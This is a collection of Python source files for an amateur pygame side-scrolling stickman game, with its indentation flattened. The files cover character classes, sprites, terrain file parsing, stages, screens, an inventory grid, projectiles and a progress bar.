coord, moved_to = self.move_to(pos, surface, pixels)
if coord == 0: pass
def start_thread(self, move_to, surf, terrain, pixels=1, daemon=False):
self.mainproc = threading.Thread(
target=self._mainloop, args=(
move_to, surf, terrain, pixels), daemon=daemon
)
self.mainproc.start()
class WeaponDummy:
def __init__(self, image):
self.image = image
def __repr__(self):
return 'WeaponDummy object with Surface %s' % self.image
def main():
pg.init()
a = pg.display.set_mode((800, 400))
testsurf = pg.surface.Surface((2, 2))
testsurf.fill(COLOURS['green'])
t = Terrain('dirt', 'flattish')
t_surf = t.build_surface()
a.blit(t_surf, (0, 0))
print('blitted')
# d = CharacterImage('test', WeaponDummy(testsurf), (0, 0), {}, {})
# d.start_thread((200, 100), a)
print(CharacterImage.get_topleft_coord(
t, *CharacterImage.find_closest_of(t, '*')))
truecoord = CharacterImage.find_closest_of(
t, '*')[0], CharacterImage.find_closest_of(t, '*')[1]
print(CharacterImage.get_topleft_coord(t, *truecoord),
CharacterImage.get_topleft_coord(t, *CharacterImage.find_closest_of(t, '*')))
# s.start_thread(CharacterImage.get_topleft_coord(t, *CharacterImage.find_closest_of(t, '#')), a)
# for i in range(100):
# i = CharacterImage('test', WeaponDummy(testsurf), (0,0), {}, {})
# i.start_thread((0, 0 ), a)
pause = events.Pause()
s = CharacterImage('test', WeaponDummy(testsurf),
CharacterImage.get_topleft_coord(t, *truecoord), {}, {})
print(CharacterImage.get_topleft_coord(t, *truecoord))
s.start_thread((800, 100), a, t)
while True:
# a.blit(PICS['Maps']['army'], CharacterImage.get_topleft_coord(t, *CharacterImage.find_closest_of(t, '*')))
# s.build_image(a)
for i in pg.event.get():
if i.type == QUIT:
print('hello?')
# cleanup and saving and stuff like that can go here, but for now time.sleep tests it.
# always remove the pause from _internal_events before putting Quit
os._exit(0)
# import time; time.sleep(1)
try:
pg.display.update()
a.fill(COLOURS['black'])
a.blit(t_surf, (0, 0))
except pg.error:
# os._exit is about to be called in a seperate thread
pass
print('updated')
CLOCK.tick(FPS)
if __name__ == '__main__':
main()
from pprint import pprint
import pygame as pg
try:
from _internal import COLOURS
except ImportError:
from ._internal import COLOURS
LARGEICONSIZE = 10
class InventoryHandler:
def __init__(self, sizex, sizey):
self.datas = [[None for i in range(sizey)] for i in range(sizex)]
#print(self.datas)
#print(self.datas)
def sort_dict(self, dictionary):
"""
sorts dictionary shaped like: {'1x2': whatever} and puts it into
the internal 2d list.
"""
#print(self.datas)
for indexes in sorted(dictionary):
x = int(indexes.split('x')[0])
y = int(indexes.split('x')[1])
# print(x, y)
# print("self.datas[{}][{}] = dictionary['{}']".format(
# x - 1, y - 1, indexes))
self.datas[x - 1][y - 1] = dictionary[indexes]
#print(self.datas)
def build(self, surf=None, topright=(0, 0), gap=7, bgcolour=COLOURS['black'], padding=2):
"""
creates the surface of the inventory image
:param surf: pass a surface if you want the image to be appended to the surface
:param topright:the topright corner for the blitting to start
:param gap: gap between blocks
:param bgcolour: the background colour of the blocks
:param padding: the padding on the edge of the surface
:return: the new/appended surface
"""
lengthx, lengthy = 0, 0
blacksurf = pg.Surface((LARGEICONSIZE, LARGEICONSIZE))
blacksurf.fill(bgcolour)
# need to calculate dimensions of surface
lenarry = len(self.datas)
lenarrx = len(self.datas[0]) # length of the first element == all the others
for i in range(lenarrx):
lengthx += (gap + LARGEICONSIZE)
lengthx += (padding * 2) # the padding must be multiplied by 2, for both sides
lengthx -= (LARGEICONSIZE - (padding + 1))
for i in range(lenarry):
lengthy += (gap + LARGEICONSIZE)
lengthy += (padding * 2)
lengthy -= (LARGEICONSIZE - (padding + 1))
if surf is None:
surf = pg.Surface((lengthx, lengthy))
surf.fill((255, 255, 255))
where_to_blit = list(map(lambda x: padding + x, topright))
for x in range(lenarry):
for i in range(lenarrx):
# print('where to blit:', where_to_blit)
surf.blit(blacksurf, where_to_blit)
where_to_blit[0] += (LARGEICONSIZE + gap)
where_to_blit[0] = (padding + topright[0]) # reset X coordinates
where_to_blit[1] += (LARGEICONSIZE + gap)
return surf
if __name__ == '__main__':
a = InventoryHandler(2, 3)
s = {
'1x1': '0',
'1x2': '1',
'1x3': '2',
'2x1': '3',
'2x2': '4',
'2x3': '5',
}
a.sort_dict(s)
# pprint(a.datas)
pg.image.save(a.build(), r'C:\Users\Michael\Desktop\image.png')
from bs4 import BeautifulSoup
from urllib.request import urlopen
import random
class Joker:
def __init__(self):
parser = BeautifulSoup(
urlopen('https://michael78912.github.io/puns.html'), 'lxml')
self.division = parser.p.get_text().split('\n')[2:-1]
self.joke = random.choice(self.division).strip()
def say_joke(self):
print(self.joke)
def new_joke(self):
self.joke = random.choice(self.division)
print(Joker().joke)
"""klass.py (I know it's spelt wrong, OK)?
base class for all character classes in SMNW. handles
image generation, spawning, and default movement, and attacking.
"""
import random
from . import terrain
from .character_image import CharacterImage
from .smr_error import SMRError
BEIGE = (232, 202, 145)
class Class:
"""
base class for stickman ranger classes.
"""
# I, personally think that a character class in a reasonably large
# game should be allowed to have at least a few more attributes than
# seven. I am so, so, sorry if you hate me, pylint.
# and too many arguments to __init__? whats that about?
# pylint: disable=too-many-instance-attributes, too-many-arguments
attack_radius = 0
chance_of_motion = 4
max_motion = 3
jump_height = 10
_chance_of_update = 2
def __init__(
self,
type_,
player_num,
weapon,
main_game_state,
stats=(50, 0, 0, 0, 0),
spec=None,
):
# the following two lines of code may seem redundant, but for a reason.
try:
self.health, self.str_, self.dex, self.mag, self.spd = stats
except ValueError:
raise SMRError('invalid length of tuple "stat" argument')
self.stats = list(stats)  # list so level_up can modify individual stats
self.player_num = player_num
self.weapon = weapon
self.image = CharacterImage(
type_, weapon, (0, 0), main_game_state)
self.type_ = type_
self.spec = spec
def __repr__(self):
return """character number {} type {}""".format(self.player_num, self.type_)
def hit(self, damage):
'takes damage by specified amount'
self.health -= damage
def heal(self, damage):
'heals by specified amount'
self.health += damage
def level_up(self, *args):
'raises characters stats by specified amount'
assert len(args) <= 6, 'Too many stats to raise'
if self.spec is None:
if not None in args:
self.spec = args[-1]
else:
raise TypeError(
'Cannot assign a special value to class, cannot support special value.'
)
# add stats
for index, amount in enumerate(args):
self.stats[index] += amount
def spawn_on_screen(self, game_state):
"""adds the character to the screen, the very beginning,
on the top, but not above or underground.
"""
# surface.blit(self.image, surface.terrain.array[0])
display = game_state['MAIN_DISPLAY_SURF']
x = 15 # we always want to spawn characters at x=15.
y = game_state['_STAGE_DATA']['stage'].terrain.get_spawn_point(x, self.image.sizey)
self.image.update_coords((x, y))
self.image.build_image(display, BEIGE)
def update(self, game_state):
"""attempt to move, and attack."""
terrain_obj = game_state['_STAGE_DATA']['stage'].terrain
self.weapon.update()
current_block_x = terrain_obj.px_to_blocks(self.image.topleft[0])
current_block_y = terrain_obj.px_to_blocks(self.image.topleft[1])
next_column = list(
terrain_obj.terrain2dlist_texts[terrain_obj.template]['text'][:, current_block_x + 1])
top_levels = {i if obj == '*' else None for i,
obj in enumerate(next_column)}
top_levels.discard(None)
#underground = terrain.is_underground(self.image.topleft, terrain_obj, self.image.sizey - 3)
can_move = True
# if underground:
# print(self, "is underground!")
# self.image.update_coords((self.image.x, self.image.y - 1))
if not top_levels:
# Umm, there is nowhere to go. whoever made this terrain file is
# a complete asshole, doing this to these poor characters. :(
print(Warning('there is no top level terrain for the character to go'))
else:
# get how far they would have to move.
distance = terrain_obj.blocks_to_px(
min([current_block_y - i for i in top_levels]) + 1)
print('has to climb %d pixels' % distance)
if 0 < distance <= self.jump_height:
print('howdy. jumping...')
# 10 pixels is the maximum a player can climb, without any sort of tool.
self.image.update_coords((self.image.x, self.image.y - 12))
elif distance > self.jump_height:
# can not jump, and can not move. stay still.
print('cannot move')
can_move = False
in_air = terrain.is_in_air(self.image.topleft, terrain_obj, 5)
if in_air:
self.image.update_coords(
(self.image.topleft[0], self.image.topleft[1] + 1))
print(self, "needs to fall")
try:
motion_target = get_closest_enemy(
game_state, self.image.topright[0])
except ValueError:
# no more enemies remaining, `min` will raise a ValueError.
return
target_x = motion_target.pos[0]
x = self.image.topright[0]
distance = target_x - x if target_x >= x else x - target_x
if distance <= self.weapon.range:
# self.weapon.attack_enemy(motion_target)
self.attack(motion_target)
print(((self.image.topright[0] - target_x) if self.image.topright[0] > target_x else (target_x - self.image.topright[0])))
can_move = random.randint(0, self.chance_of_motion) == 1 and can_move
# can_move = can_move and ((self.image.topright[0] - target_x) if self.image.topright[0] > target_x else (target_x - self.image.topright[0]))
can_move = can_move and distance >= self.weapon.range
if can_move:
print(self, "moving...")
self.image.move_to_x(self.image.topright[0] + self.max_motion,
game_state['MAIN_DISPLAY_SURF'],
pixels=random.randint(1, self.max_motion))
if game_state['MOUSEDOWN']:
if self.image.rect.collidepoint(game_state['MOUSE_POS']):
self.image.update_coords(game_state['MOUSE_POS'])
# game_state['MAIN_DISPLAY_SURF'].blit(self.picture, self.image.topright)
update = random.randint(0, self._chance_of_update) == 1
if distance <= self.weapon.range:
update = False
if not self.image.has_drawn:
# needs to draw at least once. override.
update = True
self.image.build_image(
game_state['MAIN_DISPLAY_SURF'], BEIGE, rebuild=update)
def attack(self, target):
"""attack the target enemy."""
if self.weapon.can_attack():
self.weapon.attack_enemy(target)
def get_closest_enemy(game_state, pos):
"""get and return the closest enemy to pos."""
possible_destinations = [enemy.pos[0]
for enemy in game_state['_STAGE_DATA']['enemies']]
print(possible_destinations)
distances = [pos - i if i <= pos else i -
pos for i in possible_destinations]
distance = min(distances)
return game_state['_STAGE_DATA']['enemies'][distances.index(distance)]
try:
from _internal import *
from smr_error import SMRError
except ImportError:
from ._internal import *
from .smr_error import SMRError
import pygame as pg
col = COLOURS
class MyRect(pg.Rect):
"""this class is simply for keeping track of
when boxes are shaded"""
shaded = False
_accumval = 0
underlined = False
PicInside = None
PicReprInside = ''
def __init__(self, *args, colour=col['white']):
pg.Rect.__init__(self, *args)
self.colour = colour
def shade(self, Surface, Colour='gray'):
#if not self.Shaded:
if type(Colour) not in (str, tuple, list):
raise TypeError(
'Colour argument must be string or RGB sequence.')
if type(Colour) == str:
try:
Colour = col[Colour] # convert the string to RGB tuple
except KeyError:
raise Exception(
'The Colour {} could not be found. please specify an RGB tuple instead'.
format(Colour))
new_surf = pg.Surface((self.width, self.height))
new_surf.set_alpha(75)
new_surf.fill(Colour)
Surface.blit(new_surf, (self.x, self.y))
#else:
# raise SMRError('The Box is already shaded')
def unshade(self, Surface, OrigSurf):
"""
practically the opposite of shade.
unshades the box, which is crucial.
"""
#if self.Shaded:
self.shaded = False
filler = (255, 255, 255)
new_surf = pg.Surface((self.width, self.height))
new_surf.fill(filler)
Surface.blit(new_surf, (self.x, self.y))
Surface.blit(OrigSurf, (self.x, self.y))
#else:
#raise SMRError('you cannot unshade an unshaded box!')
def draw(self, surface):
if self.shaded:
self.shade(surface)
def handle(self, event, Surface, OrigSurf, colour='gray'):
"""
handles an event. chooses to unshade if criteria is met, an all-in-one
function.
"""
x, y = event.pos
if self.collidepoint(x, y) and not self.shaded:
self.shade(Surface, colour)
self.shaded = True
elif not self.collidepoint(x, y) and self.shaded:
self.unshade(Surface, OrigSurf)
def underline(self, Surface, colour='black'):
"""
similar to shade, but instead of shading, it
will underline the rect.
"""
if self.underlined: # make sure you are not underling the rect again
raise SMRError('the rect is already underlined')
if type(colour) == str: # same as before
try:
colour = col[colour] # convert the string to RGB tuple
except KeyError:
raise Exception(
'The Colour {} could not be found. please specify an RGB tuple instead'.
format(colour))
self.underlined = True
pg.draw.line(Surface, colour, self.bottomright, self.bottomleft)
def remove_underline(self, Surface):
"""
appears to remove underline
by just drawing a blank
line over it.
"""
if not self.underlined:
raise SMRError('the box is not underlined')
pg.draw.line(Surface, (255, ) * 3, self.bottomright, self.bottomleft)
self.underlined = False
def draw_inside(self, pic, surf):
"""
draws a picture inside of self.
sets 2 properties, PicReprInside = repr(pic)
and PicInside = pic.
"""
if self.PicReprInside:
raise SMRError('there is already a picture in this box.')
_Box((self.width, self.height), self.colour, (self.x, self.y), surf,
255, pic)
self.PicReprInside = repr(pic)
self.PicInside = pic
def remove_pic(self, surf):
"""
removes the picture from inside self.
"""
_Box((self.width, self.height), self.colour, (self.x, self.y), surf)
self.PicInside = None
self.PicReprInside = ''
def _Box(size, colour, pos, surface, alpha=None, image=None) -> tuple:
"""
return a square rectangle, surface pair
uses MyRect
"""
print(pos)
new_surf = pg.surface.Surface(size)
new_surf.fill(colour)
if alpha is not None:
new_surf.set_alpha(alpha)
surface.blit(new_surf, pos)
if image is not None:
surface.blit(image, pos)
return MyRect(new_surf.get_rect(topleft=pos)), new_surf
import time
import timeit
print('hi')
timeit.timeit('''
big_list = [['hi'] * 1000] * 1000
for i in big_list:
for s in i:
pass''')
print(time.time(), 'after loops')
"""
progress_bar.py
contains one class, ProgressBar, that is basically,
just a progress bar!"""
import pygame
import math
class ProgressBar:
"""
makes a progress bar
example:
a = ProgressBar(3, (0, 0), 50, 20)
a.draw(display)
# makes a 50x20 gray bar in the top left corner
a.increment(display, 1)
# fills a third of the bar
"""
def __init__(self, increments_to_full, pos, width, height, alpha=200, righttoleft=True, colour=(211, 211, 211)):
self.increments_to_full = increments_to_full
self.pos = pos
self.width = width
self.height = height
self.colour = colour
self.righttoleft = righttoleft
self.full = 0
self.first_surf = pygame.surface.Surface((width, height))
self.first_surf.set_alpha(alpha)
self.first_surf.fill(colour)
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __gt__(self, other):
return self.increments_to_full > other.increments_to_full
def __lt__(self, other):
return self.increments_to_full < other.increments_to_full
def __ne__(self, other):
return self.__dict__ != other.__dict__
def draw(self, surface):
surface.blit(self.first_surf, self.pos)
def increment(self, surface, increment, auto_update=True):
"""
increment the progress bar by increment steps towards full.
"""
self.full = min(self.full + increment, self.increments_to_full)
filled_width = self.width * self.full // self.increments_to_full
filled = pygame.surface.Surface((max(filled_width, 1), self.height))
filled.fill(self.colour)
self.first_surf.blit(filled, (0, 0))
if auto_update:
self.draw(surface)
import pygame as pg
try:
from _internal import PICS
from sprite import SMRSprite
except ImportError:
from .sprite import SMRSprite
from ._internal import PICS
class Projectile(SMRSprite):
"""
Projectile, is as expected a projectile.
It is used as a subclass for other types of projectiles.
"""
def __init__(self, img, motion, colour, pos, main_game_state):
SMRSprite.__init__(self, main_game_state, None, pos)
self.img = PICS['Attacks'][img][colour]
self.motion = motion
def get_path(self, target, set_property=True):
if self.motion == ARC:
path = self.get_parabola(target)
elif self.motion == STRAIGHT:
raise NotImplementedError('the method is not implemented')
# path = self.get_straight_path(target)
else:
raise TypeError('%s is not a valid motion argument' % self.motion)
if set_property:
self.path = path
return path
def get_straight_path(self, target):
"""
returns a list of points along a straight line,
similar to get_parabola, but a straight line.
"""
x1, y1 = self.topleft
x2, y2 = target
m = (y2 - y1) / (x2 - x1)
step = 1 if x2 >= x1 else -1
return [(x, round(y1 + m * (x - x1))) for x in range(x1, x2 + step, step)]
def get_parabola(self, target):
"""
finds and returns a parabola,
in the form of a path, for the projectile to
move along.
"""
pt2 = tarx, tary = target
pt1 = charx, chary = self.topleft
array = []
i = charx
while i <= 610 and i >= -1000:
array.append((i, round((chary - tary) / ((charx-tarx)*(charx-tarx)) * pow((i - tarx), 2) + tary)))
if tarx >= charx:
i += 1
else:
i -= 1
return array
STRAIGHT = 0
ARC = 1
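# a small usage sketch of get_path (the 'arrow' image name and 'red' colour are
# assumptions, and Projectile needs the PICS assets, so this stays commented out):
#   p = Projectile('arrow', ARC, 'red', (0, 100), {})
#   print(p.get_path((50, 20))[:3])   # first few (x, y) points along the arc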
import random
import copy
class Screen:
firstrun = True
"""Screen is a piece of a stage.
each stage can have any number of screens, and must have
a boss screen.
all_enemies is a dictionary, with keys of enemies, and values of
the amount that enemy shoud spawn. ex:
{
SomeEnemy('blue', blablabla, 88): 10
}
will spawn 10 of SomeEnemy in this screen.
"""
def __init__(
self,
all_enemies,
spawn_mode='random',
# must put Y coordinate for each enemy to spawn
):
# assert len(
# all_enemies) == len(num_of_enemies_per_enemy
# ), "the enemies and quantities do not match"
# self.all_enemies = all_enemies
# self.num_of_enemies_per_enemy = num_of_enemies_per_enemy
# if spawn_mode == 'random':
# new_spawn_mode = []
# for enemy, quantity in zip(all_enemies, num_of_enemies_per_enemy):
# for i in range(quantity):
# new_spawn_mode.append((0 if enemy.area == 'ground' else
# random.randint(1, 600), random.randint(1, 600)))
# self.spawn_mode = new_spawn_mode
# else:
# self.spawn_mode = spawn_mode
self.total_enemies = sum(all_enemies.values())
self.enemies = []
for i in all_enemies:
self.enemies += [copy.copy(i) for x in range(all_enemies[i])]
if spawn_mode == 'random':
self.spawn_mode = [random.randint(1, 800) \
for i in range(self.total_enemies)
]
else:
self.spawn_mode = spawn_mode
def draw(self, game_state):
"""draw enemies on screen."""
terrain = game_state['_STAGE_DATA']['stage'].terrain
if self.firstrun:
game_state['_STAGE_DATA']['enemies'] = []
for enemy, x in zip(self.enemies, self.spawn_mode):
ground_level = terrain.get_spawn_point(x, terrain.blocks_to_px(enemy.size))
enemy.draw((x, ground_level), game_state['MAIN_DISPLAY_SURF'])
game_state['_STAGE_DATA']['enemies'].append(enemy)
for player in game_state['PLAYERS']:
player.spawn_on_screen(game_state)
self.firstrun = False
else:
for enemy in self.enemies:
enemy.move(game_state["PLAYERS"], game_state["MAIN_DISPLAY_SURF"], game_state['_STAGE_DATA']['stage'].terrain)
enemy.update(game_state)
for player in game_state['PLAYERS']:
player.update(game_state)
class PeacefulScreen(Screen):
def __init__(self):
super().__init__({})
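# a minimal sketch of the all_enemies mapping described in Screen's docstring:
# plain strings stand in for enemy objects here, just to show the shape.
if __name__ == '__main__':
    demo = Screen({'green blob': 3, 'red blob': 1})
    print(demo.total_enemies)   # 4
    print(len(demo.enemies))    # 4 copies made with copy.copy
    print(demo.spawn_mode)      # 4 random x positions between 1 and 800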
from distutils.core import setup
import py2exe
setup(console=['terrain.py'])
"""smr_error.py- base class for
stickmanranger errors.
"""
class SMRError(Exception):
"""
base class for stickmanranger errors
"""
pass
"""
this is the base class for basically anything
that moves in this game.
"""
__author__ = 'Michael Gill <michaelveenstra12@gmail.com>'
__version__ = '0.0'
from queue import Queue
import pprint
import threading
import pygame as pg
try:
from events import Quit, SayHello
from terrain import Terrain
except ImportError:
from .events import Quit, SayHello
from .terrain import Terrain
class SMRSprite:
sizey = 0
sizex = 0
"""
this is the base class for everything that can move
in this game. enemies, attacks, weapons, and projectiles.
_mainloop does nothing in this base class, it is just there
because it is called by start_thread.
"""
def __init__(self, main_game_state, event_queue, pos):
self.main_game_state = main_game_state
self.event_queue = event_queue
self._internal_events = Queue()
self.topleft = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
def internal_event(self, ev):
self._internal_events.put(ev)
@staticmethod
def find_closest_of(terrain, block, x=0):
"""
finds the first solid part of terrain, and returns the
index as a tuple.
"""
terrain2d = terrain.terrain2dlist_texts[terrain.template]['text']
if terrain.use_numpy:
line = terrain2d[:, x]
else:
line = [i[0] for i in terrain2d]
# print(line)
for iblock, index in zip(line, range(len(line))):
# this is going the correct way, I believe
# print(line, block)
if iblock == block:
return x, index
else:
raise TypeError('there are no %a symbols in %a' % (block, line))
@classmethod
def get_topleft_coord(cls, terrain, x, y):
"""
returns the correct coordinate
from terrain, in pixels, rather than blocks.
"""
template = terrain.terrain2dlist_texts[terrain.template]
blk_size = template['size']
x_line_size_pixels = len(
template['text'][:, x]) * blk_size if terrain.use_numpy else len(
[i[0] for i in template['text']]) * blk_size
y_line_size_pixels = len(template['text'][0]) * blk_size
new_x = x * blk_size
new_y = y * blk_size
assert new_x < x_line_size_pixels and new_y < y_line_size_pixels, 'the coordinate is too big for the screen'
return (new_x - cls.sizex, new_y - cls.sizey)
# this is all correct so far
def update_coords(self, pos):
self.topleft = pos
self.x, self.y = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
def game_quit(self):
"""
request a quit from the actual game, if needed.
"""
self.event_queue.put(Quit())
def kill_thread(self):
"""
attempts to kill the current thread, with
cleanup (removes character from screen, etc...)
"""
self._internal_events.put(Quit())
def start_thread(self, daemon=True):
"""
starts a new thread and redirects it to _mainloop.
daemon is default to true.
"""
self.mainthread = threading.Thread(
target=self._mainloop, daemon=daemon)
self.mainthread.start()
def _mainloop(self):
while 1:
if self._internal_events.empty():
pass
else:
self._internal_events.get()()
# used for debugging
print(threading.current_thread())
if __name__ == '__main__':
d = Terrain('dirt', 'test', use_numpy=True)
# print([i.tolist() for i in d.terrain2dlist_texts['test']['text']])
s1, s2 = SMRSprite.find_closest_of(d, '#')
print(s1, s2)
# print(s1, s2)
# s = repr(list([list(i) for i in d.terrain2dlist_texts[d.template]['text']]))
# a = list([list(i) for i in d.terrain2dlist_texts[d.template]['text']])
# print(a)
print(SMRSprite.get_topleft_coord(d, s1, s2))
from threading import Thread
from pygame.locals import QUIT, MOUSEBUTTONDOWN, MOUSEBUTTONUP, MOUSEMOTION, KEYDOWN
import pygame as pg
import os
WHITE = (255, 255, 255) # unbeaten
GRAY = (211, 211, 211) # beaten
TEAL = (0, 128, 128) # peaceful
YELLOW = (128, 128, 0)
BLACK = (0, 0, 0)
STAGE_SIZE = (15, 15)
class Stage:
unlocked = False
beaten = False
rect_padding = 8
game_state = {}
def __init__(
self,
name,
# name to be used by the game
position_on_map,
# (x, y) cartesian system
all_screens,
# list\tuple of all screens in stage
boss_screen,
# the screen of the boss
terrain,
# the terrain class
comes_from,
# stage that you beat to unlock it (first level is None, shouldn't
# need to put None again)
surface,
# map that the stage must be drawn on
peaceful=False,
# peaceful stage is a shop or of the like
has_icon=True,
# False if level shows upon map already, or is secret
links_to=None,
# list\tuple of all stages it links to,
decorations=(),
# tuple of decorations to be drawn
):
if comes_from is None:
comes_from = _NullStage
self.position_on_map = position_on_map
self.all_screens = all_screens
self.comes_from = comes_from
self.drawing_surface = surface
self.peaceful = peaceful
self.has_icon = has_icon
self.links_to = links_to
self.name = name
self.terrain = terrain
self.decorations = decorations
# print(os.getcwd())
with open(os.path.join(
os.getcwd(), 'music', 'smnwgameplay.mp3'
)):
print('opened successfully')
self.music = os.path.join('music', 'smnwgameplay.mp3')
self.rect = pg.Rect(position_on_map, STAGE_SIZE)
rect = self.rect
left, top, width, height = rect.left, rect.top, rect.width, rect.height
self.box = pg.Rect(left - self.rect_padding, top - self.rect_padding,
width + (self.rect_padding * 2), height + (self.rect_padding * 2)
)
def draw_on_map(self):
surface = self.drawing_surface
if self.comes_from.beaten and self.has_icon:
self.rect = pg.draw.rect(
surface, WHITE, self.position_on_map + STAGE_SIZE)
elif self.beaten and self.has_icon:
self.rect = pg.draw.rect(
surface, GRAY, self.position_on_map + STAGE_SIZE)
if self.peaceful and self.has_icon:
self.rect = pg.draw.rect(
surface, TEAL, self.position_on_map + STAGE_SIZE)
def check_hover(self, pos):
"""check to see if the mouse is hovering over. if it is,
display a box around the level, and a name.
"""
# print(left, top, width, height)
if self.box.collidepoint(*pos):
box = self.box
pg.draw.rect(self.drawing_surface, YELLOW, box, 1)
fontobj = pg.font.Font(os.path.join('data', 'MICHAEL`S FONT.ttf'), 20)
fontobj.set_bold(True)
surf = fontobj.render(self.name, True, BLACK)
surfrect = surf.get_rect()
surfrect.center = pos[0], pos[1] - 40
self.drawing_surface.blit(surf, surfrect)
def start_music(self):
"""stop old music, play new music."""
if not self.peaceful:
# keep the theme music if it is a peaceful screen.
pg.mixer.music.fadeout(2000)
print('howdy?')
pg.mixer.music.load(self.music)
pg.mixer.music.play(-1)
def init(self, game_state):
"""run the stage."""
self.game_state = game_state
Thread(target=self.start_music).start()
game_state['_STAGE_DATA'] = {
'screen_number': 0,
'screen': self.all_screens[0],
'stage': self,
}
def update(self, events):
"""update the stage, and everything related to it."""
state = self.game_state
terrain_surf = self.terrain.build_surface()
display = state['MAIN_DISPLAY_SURF']
display.fill((0, 0, 0))
current_screen = self.all_screens[state['_STAGE_DATA']['screen_number']]
display.blit(terrain_surf, (0, 0))
current_screen.draw(state)
letters = []
for event in events:
check_quit(event)
if event.type == MOUSEBUTTONDOWN:
state['MOUSEDOWN'] = True
elif event.type == MOUSEMOTION:
state['MOUSEDOWN'] = False
elif event.type == KEYDOWN:
letters.append(event.unicode)
if letters:
pass
if '~' in letters:
print('open terminal...')
def check_quit(event):
"""check if event is a quit event. if it is, quit."""
if event.type == QUIT:
pg.quit()
raise SystemExit
class _NullStage(Stage):
def __init__(self):
pass
position_on_map = None
all_screens = None
comes_from = None
drawing_surface = None
peaceful = None
has_icon = None
links_to = None
beaten = True
# d = pg.Surface((100, 100))
# d.fill((255, 255, 255))
# s = Stage(
# "Test Stage 0.0",
# position_on_map=(18, 569),
# all_screens=[PeacefulScreen],
# boss_screen=None,
# surface=d,
# terrain=Terrain('dirt', 'flat'),
# comes_from=None,
# peaceful=True,
# )
# s.draw_on_map()
# s.check_hover((100, 100))
# pg.image.save(d, r'C:\Users\Michael\Desktop\test_images\howdy.png')
try:
from _internal import *
except ImportError:
from ._internal import *
class StatusAilment:
def __init__(self, colour):
self.colour = colour
"""terrain.py
takes all terrain files (terrains/*) and converts them
into stickmanranger terrain objects.
NOTE: you may want to run this code in a background thread,
as it will probably take a while and could hang the graphics.
"""
__author__ = 'Michael Gill'
__version__ = '0.0'
from pprint import pprint
import os
import sys
from pygame.surface import Surface
from pygame.transform import scale
from pygame.locals import QUIT
import numpy
try:
from _internal import *
from smr_error import SMRError
except ImportError:
from ._internal import *
from .smr_error import SMRError
VALID_COMMANDS = ('air', 'water', 'size')
# there once was a fellow named finn
# who threw all his legs in a bin
# he realized, at last
# he could not move so fast
# and punched himself right in the chin.
class Terrain:
top_water = PICS['Other']['top_water']
surface_symbol = '*'
ground_symbol = '#'
water_symbol = '-'
air_symbol = '~'
sign_symbol = '^'
pit_symbol = '_'
top_water_symbol = '+'
# alpha values. can be overridden with headers. (see flat.smr-terrain)
air = 200
water = 100
def_air = (0, 0, 0, 200)
def_water = (0, 50, 200, 100)
def __init__(self, image, template='flat', block_size=10, use_numpy=True):
self.image1 = PICS['terrain_templates'][image]['1']
self.image2 = PICS['terrain_templates'][image]['0']
self.template = template
self.size = block_size
self.use_numpy = use_numpy
try:
Terrain.terrain2dlist_texts
except AttributeError:
self.load_text()
def __iter__(self):
for i in self.terrain2dlist:
yield i
def __getitem__(self, pos):
arr = self.terrain2dlist_texts[self.template]['text']
return arr[pos[1]][pos[0]]
def __eq__(self, other):
return self.__dict__ == other.__dict__
def get_solid(self, pos):
"""return true if the block at pos is solid."""
return self.is_solid(self[pos])
@staticmethod
def is_solid(item):
return item in (Terrain.ground_symbol, Terrain.surface_symbol)
@staticmethod
def is_water(item):
return item in (Terrain.water_symbol, Terrain.top_water_symbol)
@staticmethod
def is_pit(item):
return item == Terrain.pit_symbol
@staticmethod
def is_air(item):
return item == Terrain.air_symbol
def load_text(self):
try:
Terrain.terrain2dlist_texts
except AttributeError:
Terrain.terrain2dlist_texts = {}
all_texts = Terrain.terrain2dlist_texts
terrain_texts = {}
terrain2dlist_texts = {}
for text in os.listdir(TDIR):
a = text.split('.')[0]
terrain_texts[a] = open(os.path.join(TDIR, text)).read()
for terrain, key in zip(terrain_texts.values(), terrain_texts.keys()):
main_dict = {
'size': self.size,
'air': self.def_air,
'water': self.def_water
}
if terrain.startswith('@'):
# remove @ symbol
header = terrain.split('\n')[0][1:]
terrain = '\n'.join(terrain.split('\n')[1:])
header = header.split('|')
# remove all whitespace
header = [part.strip().replace((' '), '')
.replace('\n', '')
.replace('\r', '')
.replace('\t', '')
for part in header]
for command in header:
parts = command.split('=')
if parts[0] not in VALID_COMMANDS:
raise SyntaxError(
'%a is not a valid command for header' % parts[0])
else:
main_dict[parts[0]] = eval(parts[1])
lines = []
for line in terrain.split('\n'):
if ';' in line:
line = line.split(';')[0].strip()
# dont append blank lines!
if line != '':
lines.append(line)
terrain2dlist = []
for line in lines:
chars = []
for char in line:
chars.append(char)
terrain2dlist.append(chars if not self.use_numpy
else numpy.array(chars))
main_dict['text'] = terrain2dlist if not self.use_numpy \
else numpy.array(terrain2dlist)
terrain2dlist_texts[key] = main_dict
Terrain.terrain2dlist_texts = terrain2dlist_texts
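# Illustrative .smr-terrain layout, as this parser reads it (the files actually
# shipped with the game may differ):
#
#   @ size=20 | air=(0, 0, 0, 150) | water=(0, 60, 200, 90)
#   ~~~~~~~~^~~~~~~~~   ; '~' = air, '^' = next-screen sign
#   ~~~~~+++++~~~~~~~   ; '+' = top water (drawn over plain water)
#   *****-----*****_*   ; '*' = surface, '-' = water, '_' = pit
#   #################   ; '#' = solid ground
#
# the optional '@' header is split on '|'; every command must be one of
# VALID_COMMANDS and its value is passed through eval(); ';' starts a comment
# and blank lines are dropped.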
def build_surface(self, override=None, display=None):
"""
builds the terrain image and returns it.
also sets self.built_image to the surface.
"""
pit_picture = PICS['Other']['pit']
sign_picture = PICS['Other']['next']
# the surface everything will be added to
big_actual_picture = Surface((800, 400))
if getattr(self, 'decorations', False):
self.decorations[0].draw_all()
# find the 2D list of the specified terrain
template = self.terrain2dlist_texts[self.template]
# the template header may override the block size; apply it before scaling
if template['size'] is not None:
    self.size = template['size']
# scale() returns new Surfaces, so keep the results
self.image1 = scale(self.image1, (self.size, ) * 2)
self.image2 = scale(self.image2, (self.size, ) * 2)
text = template['text']
air_picture = Surface((self.size, ) * 2)
air_picture.fill(template['air'])
water_picture = Surface((self.size, ) * 2)
water_picture.fill(template['water'])
top_water_picture = self.top_water
_change_colour_surface(top_water_picture, *template['water'][:3])
try:
top_water_picture.set_alpha(template['water'][3])
